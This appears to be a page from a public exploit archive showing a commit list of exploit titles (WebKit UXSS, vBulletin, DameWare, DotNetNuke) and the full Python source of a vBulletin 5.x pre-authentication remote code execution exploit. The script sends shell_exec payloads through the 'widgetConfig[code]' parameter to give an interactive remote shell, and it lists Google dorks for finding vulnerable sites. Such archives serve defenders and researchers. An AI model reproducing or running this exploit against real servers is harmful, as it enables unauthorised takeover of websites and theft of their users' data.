4eaf273757
9 changes to exploits/shellcodes kic 2.4a - Denial of Service WebKit - UXSS Using JavaScript: URI and Synchronous Page Loads WebKit - Universal XSS in WebCore::command WebKit - User-agent Shadow root Leak in WebCore::ReplacementFragment::ReplacementFragment WebKit - Universal XSS Using Cached Pages DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH) vBulletin 5 - 'routestring' Remote Code Execution vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion vBulletin 5.x - 'routestring' Remote Code Execution vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion PHP 7.1 < 7.3 - disable_functions Bypass vBulletin 5.0 < 5.5.4 - Unauthenticated Remote Code Execution DotNetNuke < 9.4.0 - Cross-Site Scripting
31 lines
No EOL
850 B
Python
Executable file
31 lines
No EOL
850 B
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
# vBulletin 5.x 0day pre-auth RCE exploit
|
|
#
|
|
# This should work on all versions from 5.0.0 till 5.5.4
|
|
#
|
|
# Google Dorks:
|
|
# - site:*.vbulletin.net
|
|
# - "Powered by vBulletin Version 5.5.4"
|
|
|
|
import requests
|
|
import sys
|
|
|
|
if len(sys.argv) != 2:
|
|
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
|
|
|
|
params = {"routestring":"ajax/render/widget_php"}
|
|
|
|
while True:
|
|
try:
|
|
cmd = raw_input("vBulletin$ ")
|
|
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
|
|
r = requests.post(url = sys.argv[1], data = params)
|
|
if r.status_code == 200:
|
|
print r.text
|
|
else:
|
|
sys.exit("Exploit failed! :(")
|
|
except KeyboardInterrupt:
|
|
sys.exit("\nClosing shell...")
|
|
except Exception, e:
|
|
sys.exit(str(e)) |